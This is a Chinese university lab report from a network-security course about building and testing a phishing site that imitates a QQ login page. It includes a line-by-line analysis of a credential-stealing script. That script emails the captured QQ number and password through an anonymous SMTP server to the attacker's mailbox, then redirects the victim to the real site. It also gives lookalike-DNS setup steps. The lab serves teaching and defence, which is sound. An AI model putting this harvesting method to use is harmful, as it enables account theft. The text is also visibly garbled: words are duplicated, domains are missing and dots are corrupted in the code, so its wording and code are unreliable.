实验三网站钓鱼攻击,实验报告
南京工程学院 实
验
报
告
题
目
网站钓鱼攻击
课 程 名 称
网络与信息安全技术
院(系、部、中心)
计算机工程学院
专
业
网络工程
班
级
学 生 姓 名
学
号
设 计 地 点
信息楼 A216
指 导 教 师
毛云贵
实 验 时 间
2014 年 3 月 20 日
实 验 成 绩
一实验目的 1、了解钓鱼攻击的概念与实现原理 2、了解钓鱼网站与正常网站的区别 3、提高抵御钓鱼攻击的能力 二实验环境 Windows,交换网络结构, UltraEdit
三实验原理 3 3 、1 1. . 什么就 是钓鱼网站
网络钓鱼就是通过大量发送声称来自于银行或其她知名机构的欺骗性垃圾邮件,意图引诱收信人给出敏感信息(如用户名、口令、帐号 ID、ATM PIN 码或信用卡详细信息)的一
种攻击方式。最典型的网络钓鱼攻击将收信人引诱到一个通过精心设计与目标组织的网站非常相似的钓鱼网站上,并获取收信人在此网站上输入的个人敏感信息,通常这个攻击过程不会让受害者警觉。这些个人信息对黑客们具有非常大的吸引力,因为这些信息使得她们可以假冒受害者进行欺诈性金融交易,从而获得经济利益。受害者经常遭受严重的经济损失或个人信息被窃取。
钓鱼网站通常伪装成为银行网站,窃取访问者提交的账号与密码信息。它一般通过电子邮件传播,此类邮件中包含一个经过伪装的链接,该链接将收件人链接到钓鱼网站。钓鱼网站的页面与真实网站界面完全一致,要求访问者提交账号与密码。一般来说钓鱼网站结构很简单,只就是一个或几个页面,URL 与真实网站有细微差别,如真实的工行网站为、com、cn,针对工行的钓鱼网站则可能为、com、cn。
3 3 、2 2. . 钓鱼网站的防范措施
1、启用专用域名
现在的网址有好几种,、com 就是一个商业性网站,而、gov 就是政府网站,、org 则就是非政府组织网站。域名不同,代表的意思也不同。因此可以借鉴政府网站有专用域名做法,为网上银行设置专用域名。这种作法虽然从根本上无法杜绝钓鱼网站的存在,但确实在很大程度上打击了假冒的网银网站。
2、规范搜索引擎
在网银安全问题上,银行惟一能采取的办法就就是投入大量的人力物力,不间断地在网上通过人工或就是自动搜索同自己域名类似的假冒网站、网络实名,甚至必须介入电子邮件搜索就是否有人假借银行名义行欺骗之实,即使就是几个银行联合起来打假,平摊的只就是成本,技术始终就是个难题。因此可以规范搜索引擎,从搜索引擎层面上来干预与网上银行域名类似的网站。
3、银行数字证书
银行可以通过使用银行证书的方式来验明网上银行的正身,只有拥有正确的证书才能证明该网站就是正确的网上银行而不就是钓鱼网站。
4、客户安全使用网银
(1)避免使用搜索引擎
从正规银行网点取得网络银行网址并牢记,登录网银时尽量避免使用搜索引擎或网络实名,以免混淆视听。
(2)设置混合密码、双密码
密码设置应避免与个人资料相关,建议选用数字、字母混合密码,提高密码破解难度并妥善保管,交易密码尽量与信用卡密码不同。
(3)定期查瞧交易记录 定期查瞧网银办理的转帐与支付等业务记录,或通过短信定制账户变动通知,随时掌握账户变动情况。
(4)妥善保管数字证书
避免在公用计算机上使用网银,以防数字证书等机密资料落入她人之手。
(5)警惕电子邮件链接
网上银行一般不会通过电子邮件发出“系统维护、升级”提示,若遇重大事件,系统必须暂停服务,银行会提前公告顾客。一旦发现资料被盗,应立即修改相关交易密码或进行银行卡挂失。
三. . 钓鱼网站的关键源码分析
钓鱼网站的位置:“C:\ExpNIS\SocEng-Lab\Fishing\钓鱼网站\qqqet”,用UltraEdit-32 可查瞧或编辑源码。
钓鱼网站构造比较简单,主要组成部分其实就就是两个文件 index、htm,steal、asp。index、htm 为钓鱼网站的前台表现页面,steal、asp 为钓鱼网站的后台控制程序。具体分析一下这两个文件。
1、index、htm 文件
用户使用域名“、qq、com”登录钓鱼网站后,进入的页面就就是 index、htm,该页就是钓鱼网站的表现页面,其主要完成表单提交,用户信息就是否为空的验证,验证用户信息不为空的话,就将用户输入的信息传入 steal、asp。页面源码中很多都就是为页面的表现形式,表现效果服务的,这些源码不做分析。下面分析一下关键代码:
上行代码解析: (1)“name”就是表单的名称,这里给该表单命名为“form1”。
(2)“onsubmit="return checkinput()"”就是提交表单之前执行的方法,在下一大 段代码中会具体介绍 checkinput()方法。
(3)“action=steal、asp”就是提交表单后跳转的文件,这里就是跳转到 steal、asp。
(4)“method=post”就是表单提交方法,该方法有两种,一种就是 post,一种就是get。post 就是隐含参数提交,就就是提交的时候 url 中不显示用户名,密码信息。get 就是显示参数提交,就就是提交的时候 url 中显示用户名,密码信息。
上段代码大部分都就是效果与表现形式,关键的部分用粗体字代替。这段代码就是建立一个
文本输入框,“type=text”就是给输入框的类型定义为文本形式,“name=u”就是将文本输入框的名称定义为“u”,“u、value”就就是文本框输入的内容。
上段代码就是建立一个密码输入框,“type=password”就是给输入框定义为密码形式,“name=p”就是将密码输入框的名称定义为“p”,“p、value”就就是密码框输入的内容。
上段代码的意思就是建立一个登录的按钮,用于提交用户信息的。表单部分的代码中onsubmit="return checkinput()"”,它的意思就是调用下面这段代码。
上段代码解析:
(1)“if(document、form1、u、value=="")”if 条件判断,“document、form1、u、value”就是取得文本框中内容,也就就是 QQ 号码,对它进行判断,判断它的内容就是不就是空值,如果就是空值,就执行下面{}中的内容。
(2)“alert("您还没有输入 QQ 号码")”alert 就是弹出对话框,对话框的内容就是“您还没有输入 QQ 号码”。
(3)“document、form1、u、focus()”将鼠标焦点定位到文本框的位置。
(4)“return false”返回值就是“false”,即不提交表单内容,返回“index、htm”。
2、steal、asp 文件
用户提交表单后,将用户信息传入 steal、asp 中,在 steal、asp 中进行业务逻辑处理。
具体处理的内容:将用户信息以邮件的形式发送到指定邮箱,弹出误导对话框,引导
到正常网站。关键代码解析: 上段代码解析:代码中引用 VBScript 脚本语言,“u=request、form("u")”在该页取得表单提交的文本框内容,即 QQ 号码,定义为“u”,“p=request、form("p")”在该页取得表单提交的密码框内容,即 QQ 密码,定义为“p”。下面这段代码就是引用 vbs 脚本,功能就是负 发 送 邮 件 ( 将 用 户 输 入 的 内 容 , 以 邮 件 的 形 式 发 送 到 指 定 邮 箱 ) 。
上段关键代码解析:
(1)“NameSpace="、microsoft、com/cdo/configuration/"”定义 NameSpace 命名空间。
(2)“Set Email = CreateObject("CDO、Message")”开启邮件服务。
(3)“Email、From = "anyone@CServer、NetLab"”邮件发送方的邮箱。
(4)“Email、To = "xxxxx@CServer、NetLab"”邮件接收方的邮箱。
(5)“Email、Subject = "username and password"”发送邮件的主题。
(6)“Email、Textbody = "username:" & u & " " & "password:" & p”发送邮件的具体内容,即 username:“用户的 QQ 号码”,password:“用户的 QQ 密码”。
(7)“Item(NameSpace&"smtpserver") = "172、16、0、254"”接收邮件的服务器。
(8)“Item(NameSpace&"smtpauthenticate") = 0”设置邮件发送者就是否为匿名用户发送,设置为 0 则为匿名用户发送,若设置为 0 则不用设置“Email、From”的邮箱(发送者的邮箱)。设置为 1 则为真实存在的用户发送,发送者的邮箱,邮箱的用户名,密码必须就是真实 存 在 的 , 即 “Email 、
From”,“Item(NameSpace&"sendusername")”,“Item(NameSpace&"sendpassword")” 必须设置真实存在的邮箱名,邮箱用户名,邮箱密码。此处作为攻击用,必须设置为 0。
(9)“Item(NameSpace&"sendusername") = "any"” 与“Item(NameSpace&"sendpassword") = "any"” 邮 件 发 送 者 的 邮 箱 用 户 名 , 因 为“Item(NameSpace&"smtpauthenticate")”设置为 0,所以这两句脚本没用到,用"注释掉了。
(10)“Update”将上面设置的内容在程序执行的时候更新确认。
(11)“Email、Send”邮件发送出去。
下面的代码主要就是欺骗误登录钓鱼网站的用户,将用户引导到正常网站。
上段代码很多处都就是html标签,用于网页显示。关键代码就是javascript部分,解析如下:
(1)“alert("用户名或密码输入错误!")”弹出提示对话框,对话框内容就是“用户名或密码输入错误!”。
(2)“window、location="、qqpet、qq、com";”将用户引导到正常网站,用的就是javascript 中“window、location”方法。用法就就是 window、location=“要跳转到的地址(域名或 ip 地址)”。
钓鱼网站关键的源码分析完毕,正常网站的源码只有一个 index、htm 文件,与钓鱼网站中的 index、htm 文件类似,不做具体分析。
四实验方法及步骤 本练习主机 A、B、C 为一组,D、E、F 为一组,下面以主机 A、B、C 为例,说明实验步骤 实验主机 实验角色 主机 A 钓鱼网站,黑客 主机 B 正常网站,DNS 服务器 主机 C 被欺骗者
首先使用“快照 X”恢复 Windows 系统环境。
一. . 初始化环境的准备
1.主机 A 的操作 (1)主机 A 配置 Outlook Express 邮箱,建立邮件帐户(参见附录 A-Outlook Express 配置方法)。这里以“user1A@CServer、NetLab”邮箱为例说明实验步骤。
(2)更改钓鱼网站源码中接收邮件的邮箱(源码分析详见实验原理)。进入钓鱼网站目录“C:\ExpNIS\SocEng-Lab\Fishing\钓鱼网站\qqqet”,点击右键使用 UltraEdit 打开steal、asp,如图 4-1 所示:
图 4-1
邮件发送源码
将上图中标记内容,更改为主机 A 配置好的邮箱,保存后退出。
(3)发布钓鱼网站。单击“开始”|“程序”|“管理工具”|“Internet 信息服务(IIS)管理器”,启动钓鱼网站。
「注」启动钓鱼网站之前要先关闭默认网站与正常网站,默认网站,钓鱼网站,正常网站端口号都就是 80,只允许开启一个网站。
(4)主机 A 配置 DNS 服务器为主机 B 的 ip。
2.主机 B 的操作
(1)安装 DNS,具体步骤:
●
点击“开始”|“设置”|“控制面板”|“添加或删除程序”|“添加/删除Windows 组件(A)”,弹出“Windows 组件向导”的窗口,在组件中将鼠标焦点定位到“网络服务”的选项上,如图 4-2 所示:
图 4-2
Windows 组件向导
●
点击“详细信息”,然后在网络服务的子组件中选择域名系统(DNS),选择后点击“确定”。
●
点击“下一步”,进入安装界面,约 2 秒后,弹出所需文件窗口,点击“浏览”,进入到
“C:\ExpNIS\SocEng-Lab\Tools\DNS 安装组件”,选择 DNSMGR、DL_,点击“打开”。然后点击“确定”,安装过程中会出现“Windows 文件保护”的提示对话框,如图 4-3 所示:
图 4-3
DNS 组件安装过程
将此对话框关闭,继续点击“浏览”,还就是进入到“C:\ExpNIS\SocEng-Lab\Tools\DNS 安装组件”,选择 DNSMGMT、MS_,点击“打开”,然后再点击“确定”,安装即将完成的时候会弹出“可选网络组件”的提示对话框,如图 4-4 所示:
图 4-4
可选网络组件对话框
(2)配置 DNS,具体步骤:
●
单击“开始”|“程序”|“管理工具”|“DNS”,进入 DNS 配置界面,点击主机展开树,如图 4-5 所示:
图 4-5
DNS 配置 ●
右键点击“正向查找区域”,选择新建区域,弹出新建区域向导,点击“下一步”,然后选择默认的主要区域,继续点击“下一步”。
●
在区域名称处填写“qqpet、qq、com”,一直点击击“下一步”,最后点击“完成”。
●
右键点击“qqpet、qq、com”,选择新建主机,弹出新建主机的窗口,在名称处填写“www”,在ip地址处填写“ 主机B的IP地址 ”(此域名为正常网站的域名,根据角色分配得知,正常网站存在于主机 B 中),点击“添加主机”,弹出成功添加主机记录的对话框,点击“确定”,再点击“完成”就成功创建了主机。
●
根据上面的方法,再新建一个区域名为“qqqet、qq、com”的区域,并在这个区域中新建名为“www”的主机,ip 地址为 主机 A 的 IP 地址 (此域名为钓鱼网站的域名,根据角色分配得知,钓鱼网站存在于主机 A 中)。
(3)发布正常网站。打开 IIS,启动正常网站。
「注」启动正常网站之前要先关闭钓鱼网站与默认网站,默认网站,钓鱼网站,正常网站端口号都就是 80,只允许开启一个网站。
3.主机 C 的操作
主机 C 配置 DNS 服务器为 主机 B 的 IP 地址 。
二. . 钓鱼式手法模拟
1.主机 C 登录钓鱼网站
假设主机 C 误输入,造成主机 C 进入到钓鱼网站。主机 C 在浏览器中使用域名“、qq、com”,登录到钓鱼网站,仔细观察页面信息与域名信息。
2.主机 C 在钓鱼网站输入相关信息
主机 C 在钓鱼网站中输入 QQ 号码与 QQ 密码,QQ 号码:123456。QQ 密码:admin,(此用户名与密码均为正确的,在正常网站中使用会有所体现),单击“登录”,之后会弹出一个对话框”用户名或密码错误”,“确定”后会引导到正常网站。同时刚才输入的 QQ 号码与 QQ密码会以邮件的形式发送到主机 A 的邮箱。
3.主机 C 在正常网站输入相关信息
主机 C 跳转到正常网站后,仔细观察域名与页面信息。观察后得知,与钓鱼网站相比,页面信息没什么变化,只就是域名发生了细微的变化,“、qq、com”变成了“、qq、com”,如果不仔细观察,很难发现这一点。主机 C 继续操作,QQ 号码输入“123456”,QQ 密码输入“admin”,登录后会有登录成功的提示。
4.主机 A 登录邮箱,查瞧邮件
主机 A 登录 Outlook Express 邮箱,打开收到的新邮件,内容就是主机 C 在钓鱼网站输入的 QQ 号码与 QQ 密码,对比一下主机 C 记录的 QQ 号码与 QQ 密码。
5.主机 A 登录正常网站
主机 A 用域名“、qq、com”登录正常网站,用钓到的“主机 C 的用户信息”进行登录。
6.主机 C 的防范方法
用户应该注意提高自己的安全意识,不要通过搜索引擎、匿名邮件、陌生电话等提供的网址访问网上银行等,要注意对域名信息的仔细辨别,以防止不慎访问钓鱼网站。
五实验数据记录及分析 首先主机 A 配置 Outlook Express 邮箱,建立邮件帐户,具体如图 5-1
图 图 5-1 机 主机 A 发布钓鱼网站, 如图 5-2 所示
图 图 5-2 机 主机 B DNS 服务器配置如图 5-3 所示
图 图 5-3 实验成功截取了主机 机 c 主机输入的 qq 用户名与密码,图 图 5-4 所示
图 图 5--4 六实验总结 通过本次实验,我能将课堂上学习的知识在试验中得到验证,加深对相关知识点的理解。不仅掌握了钓鱼网站相关知识以及维护中常用的工具而且对网络安全有了更加深入的理解。
总之,这次实验让我受益匪浅,不仅学到了新的知识,还让以前书本上学的理论知识在实践中加以应用,做到学以致用。还有,养成的一些良好习惯,对以后的学习与工作都就是有帮助的。
这次实验不仅让我复习了钓鱼网站的相关知识,而且将网络安全技术的知识融汇贯通,让我们在课堂上学习的知识有了实践的机会,充分锻炼了自己的动手能力,并且将书本上抽象的理论上升到了应用的高度,让知识紧密围绕应用,以兴趣激发学习 。
教师评阅: :
90-95 分: 实验课前做了充足的准备工作,与专业相关知识能紧密联系。实验报告条理清晰,书写规范,图文并茂,报告内容全面,主要内容阐述详细。认识体会深刻,起到了实验的目的。
80-85 分: 实验课前做了充足的准备工作,与专业相关知识能较紧密联系。实验报告条理清晰,书写规范,图文并茂,报告内容较全面,主要内容阐述较详细。认识体会较深刻,达到了实验的作用。
70-75 分: 实验课前准备较充足,与专业相关知识能基本能联系,实验报告条理清晰,书写较规范,报告内容较全面,能用部分图片展示相关内容,主要内容阐述较详细。认识体会较深刻,达到了实验的目的。
60-65 分: 实验课前准备不够充足,与专业相关知识不能紧密联系。实验报告条理基本清晰,书写基本规范,报告内容基本全面,主要内容阐述基本详细。认识体会不太深刻,基本达到实验的目的。
上一篇:数字图像处理实验报告